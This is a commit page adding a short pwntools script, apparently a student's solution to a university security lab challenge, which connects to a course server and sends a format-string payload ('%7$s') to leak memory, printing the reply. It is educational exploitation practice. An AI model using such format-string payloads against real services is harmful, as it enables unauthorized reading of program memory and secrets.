Lab7
This commit is contained in:
12
pa/lab7/chall_local_read.py
Normal file
12
pa/lab7/chall_local_read.py
Normal file
@@ -0,0 +1,12 @@
|
||||
from pwn import remote
|
||||
|
||||
HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
|
||||
PORT = 25191
|
||||
|
||||
conn = remote(HOST, PORT)
|
||||
|
||||
pl = b"%7$s\n"
|
||||
|
||||
conn.send(pl)
|
||||
while conn.connected():
|
||||
print(chr(conn.recv(1)[0]), end="", flush=True)
|
||||
Reference in New Issue
Block a user